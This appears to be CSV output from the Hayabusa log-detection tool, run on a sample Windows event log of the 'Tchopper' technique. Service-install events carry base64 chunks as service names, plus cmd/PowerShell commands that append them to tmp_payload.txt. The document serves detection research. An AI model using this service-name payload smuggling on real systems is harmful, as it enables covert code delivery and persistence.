2021-11-03 17:20:33.674 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJDYXVnaHQgb24gbGluZSBudW1iZXI6ICRFcnJvckxpbmVOdW1iZXIiDQoNCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:35.128 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:35.128 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:35.128 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:36.582 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGxvZyBtZXNzYWdlcyB0aHJvdWdob3V0IHRoZSBzY3JpcHQgZXhlY3V0aW9uIA0KDQojQHBhcmFtICRzZXZlcml0eSAgIC0+IEhvdyBzZXZlcmUgb2YgdGhl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:36.582 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGxvZyBtZXNzYWdlcyB0aHJvdWdob3V0IHRoZSBzY3JpcHQgZXhlY3V0aW9uIA0KDQojQHBhcmFtICRzZXZlcml0eSAgIC0+IEhvdyBzZXZlcmUgb2YgdGhl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:36.582 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGxvZyBtZXNzYWdlcyB0aHJvdWdob3V0IHRoZSBzY3JpcHQgZXhlY3V0aW9uIA0KDQojQHBhcmFtICRzZXZlcml0eSAgIC0+IEhvdyBzZXZlcmUgb2YgdGhl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:38.020 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IGlucHV0IG1lc3NhZ2UgdG8gbG9nICAgDQojQHBhcmFtICRsb2dNZXNzYWdlIC0+IFRoZSBtZXNzYWdlIHRoYXQgd2lsbCBiZSBsb2dnZWQgY2FzdCB0byBhIHN0cmluZw0KDQojIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:38.020 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IGlucHV0IG1lc3NhZ2UgdG8gbG9nICAgDQojQHBhcmFtICRsb2dNZXNzYWdlIC0+IFRoZSBtZXNzYWdlIHRoYXQgd2lsbCBiZSBsb2dnZWQgY2FzdCB0byBhIHN0cmluZw0KDQojIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:38.020 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IGlucHV0IG1lc3NhZ2UgdG8gbG9nICAgDQojQHBhcmFtICRsb2dNZXNzYWdlIC0+IFRoZSBtZXNzYWdlIHRoYXQgd2lsbCBiZSBsb2dnZWQgY2FzdCB0byBhIHN0cmluZw0KDQojIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:39.470 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBXcml0ZS1Mb2cgeyBwYXJhbSgkc2V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:39.470 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBXcml0ZS1Mb2cgeyBwYXJhbSgkc2V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:39.470 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBXcml0ZS1Mb2cgeyBwYXJhbSgkc2V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:40.933 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZXJpdHksIFtzdHJpbmddJGxvZ01lc3NhZ2UpDQogICAgDQogICAgdHJ5IHsNCiAgICAgICAgDQogICAgICAgIGlmICgkbG9nTWVzc2FnZS5sZW5ndGggLUdUIDIwMCkgew0KICAgICAgICAgICAgJG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:40.933 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZXJpdHksIFtzdHJpbmddJGxvZ01lc3NhZ2UpDQogICAgDQogICAgdHJ5IHsNCiAgICAgICAgDQogICAgICAgIGlmICgkbG9nTWVzc2FnZS5sZW5ndGggLUdUIDIwMCkgew0KICAgICAgICAgICAgJG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:40.933 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZXJpdHksIFtzdHJpbmddJGxvZ01lc3NhZ2UpDQogICAgDQogICAgdHJ5IHsNCiAgICAgICAgDQogICAgICAgIGlmICgkbG9nTWVzc2FnZS5sZW5ndGggLUdUIDIwMCkgew0KICAgICAgICAgICAgJG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:42.386 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: xvZ01lc3NhZ2UgPSAkbG9nTWVzc2FnZS5TdWJzdHJpbmcoMCwyMDApICsgIi4uLiINCg0KICAgICAgICB9DQoNCiAgICAgICAgJG91dHB1dCA9ICRsb2dNZXNzYWdlICsgImBuIg0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:42.386 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xvZ01lc3NhZ2UgPSAkbG9nTWVzc2FnZS5TdWJzdHJpbmcoMCwyMDApICsgIi4uLiINCg0KICAgICAgICB9DQoNCiAgICAgICAgJG91dHB1dCA9ICRsb2dNZXNzYWdlICsgImBuIg0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:42.386 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xvZ01lc3NhZ2UgPSAkbG9nTWVzc2FnZS5TdWJzdHJpbmcoMCwyMDApICsgIi4uLiINCg0KICAgICAgICB9DQoNCiAgICAgICAgJG91dHB1dCA9ICRsb2dNZXNzYWdlICsgImBuIg0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:43.824 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IHN3aXRjaCgkU2V2ZXJpdHkpIHsNCiAgICAgICAgDQogICAgICAgICAgICAkSU5GT19MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBHcmVlbjsgYnJlYWt9IA0KICAgICAgICAgICANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:43.824 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IHN3aXRjaCgkU2V2ZXJpdHkpIHsNCiAgICAgICAgDQogICAgICAgICAgICAkSU5GT19MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBHcmVlbjsgYnJlYWt9IA0KICAgICAgICAgICANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:43.824 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IHN3aXRjaCgkU2V2ZXJpdHkpIHsNCiAgICAgICAgDQogICAgICAgICAgICAkSU5GT19MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBHcmVlbjsgYnJlYWt9IA0KICAgICAgICAgICANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:45.277 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICAgICRJTlBVVF9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBDeWFuOyBicmVha30NCg0KICAgICAgICAgICAgJFdBUk5fTE9HIHtXcml0ZS1Ib3N0ICRvdXRwdXQgLUZvcmUgQ3lh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:45.277 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICRJTlBVVF9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBDeWFuOyBicmVha30NCg0KICAgICAgICAgICAgJFdBUk5fTE9HIHtXcml0ZS1Ib3N0ICRvdXRwdXQgLUZvcmUgQ3lh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:45.277 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICRJTlBVVF9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBDeWFuOyBicmVha30NCg0KICAgICAgICAgICAgJFdBUk5fTE9HIHtXcml0ZS1Ib3N0ICRvdXRwdXQgLUZvcmUgQ3lh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:46.746 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: bjsgYnJlYWt9DQoNCiAgICAgICAgICAgICRFUlJPUl9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBSZWQ7IGJyZWFrfQ0KDQogICAgICAgICAgICBEZWZhdWx0IHtXcml0ZS1Ib3N0ICJVbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:46.746 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bjsgYnJlYWt9DQoNCiAgICAgICAgICAgICRFUlJPUl9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBSZWQ7IGJyZWFrfQ0KDQogICAgICAgICAgICBEZWZhdWx0IHtXcml0ZS1Ib3N0ICJVbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:46.746 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bjsgYnJlYWt9DQoNCiAgICAgICAgICAgICRFUlJPUl9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBSZWQ7IGJyZWFrfQ0KDQogICAgICAgICAgICBEZWZhdWx0IHtXcml0ZS1Ib3N0ICJVbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:48.200 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: FibGUgdG8gbG9nIGJhc2VkIG9uIHNlcmVyaXR5OiAkU2V2ZXJpdHkiIC1Gb3JlIEN5YW47IGJyZWFrfQ0KICAgICAgICB9DQoNCiAgICB9DQoNCiAgICBjYXRjaCB7DQogICAgICAgIA0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:48.200 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: FibGUgdG8gbG9nIGJhc2VkIG9uIHNlcmVyaXR5OiAkU2V2ZXJpdHkiIC1Gb3JlIEN5YW47IGJyZWFrfQ0KICAgICAgICB9DQoNCiAgICB9DQoNCiAgICBjYXRjaCB7DQogICAgICAgIA0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:48.200 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: FibGUgdG8gbG9nIGJhc2VkIG9uIHNlcmVyaXR5OiAkU2V2ZXJpdHkiIC1Gb3JlIEN5YW47IGJyZWFrfQ0KICAgICAgICB9DQoNCiAgICB9DQoNCiAgICBjYXRjaCB7DQogICAgICAgIA0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:49.641 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICBXcml0ZS1Ib3N0ICJVbmFibGUgdG8gbG9nYG4iIC1Gb3JlIFJlZA0KDQogICAgICAgIFdyaXRlLUhvc3QgJEVycm9yWzBdIC1Gb3JlIFJlZA0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:49.641 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICBXcml0ZS1Ib3N0ICJVbmFibGUgdG8gbG9nYG4iIC1Gb3JlIFJlZA0KDQogICAgICAgIFdyaXRlLUhvc3QgJEVycm9yWzBdIC1Gb3JlIFJlZA0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:49.641 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICBXcml0ZS1Ib3N0ICJVbmFibGUgdG8gbG9nYG4iIC1Gb3JlIFJlZA0KDQogICAgICAgIFdyaXRlLUhvc3QgJEVycm9yWzBdIC1Gb3JlIFJlZA0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:51.086 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AkRXJyb3JbMF0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUhvc3QgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciIgLUZvcmUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:51.086 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkRXJyb3JbMF0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUhvc3QgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciIgLUZvcmUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
